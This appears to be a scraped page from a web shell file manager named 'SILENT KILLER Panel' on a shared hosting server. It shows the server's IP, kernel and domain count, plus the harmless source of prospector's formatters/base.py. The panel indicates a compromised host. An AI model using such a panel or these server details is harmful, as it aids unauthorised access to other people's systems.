SILENT KILLERPanel

Current Path: > > opt > cloudlinux > venv > lib64 > python3.11 > site-packages > prospector > formatters


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: //opt/cloudlinux/venv/lib64/python3.11/site-packages/prospector/formatters

NameTypeSizeLast ModifiedActions
__pycache__ Directory - -
__init__.py File 439 bytes April 17 2025 13:10:59.
base.py File 1252 bytes April 17 2025 13:10:59.
emacs.py File 767 bytes April 17 2025 13:10:59.
grouped.py File 1239 bytes April 17 2025 13:10:59.
json.py File 930 bytes April 17 2025 13:10:59.
pylint.py File 1741 bytes April 17 2025 13:10:59.
text.py File 3020 bytes April 17 2025 13:10:59.
vscode.py File 1294 bytes April 17 2025 13:10:59.
xunit.py File 2431 bytes April 17 2025 13:10:59.
yaml.py File 613 bytes April 17 2025 13:10:59.

Reading File: //opt/cloudlinux/venv/lib64/python3.11/site-packages/prospector/formatters/base.py

from abc import ABC, abstractmethod

__all__ = ("Formatter",)

from pathlib import Path

from prospector.message import Message


class Formatter(ABC):
    def __init__(self, summary, messages, profile, paths_relative_to: Path = None):
        self.summary = summary
        self.messages = messages
        self.profile = profile
        self.paths_relative_to = paths_relative_to

    @abstractmethod
    def render(self, summary=True, messages=True, profile=False):
        raise NotImplementedError

    def _make_path(self, path: Path) -> str:
        if self.paths_relative_to is None:
            path = path.absolute()
        elif path.is_absolute():
            path = path.relative_to(self.paths_relative_to)
        return str(path)

    def _message_to_dict(self, message: Message) -> dict:
        loc = {
            "path": self._make_path(message.location.path),
            "module": message.location.module,
            "function": message.location.function,
            "line": message.location.line,
            "character": message.location.character,
        }
        return {
            "source": message.source,
            "code": message.code,
            "location": loc,
            "message": message.message,
        }

SILENT KILLER Tool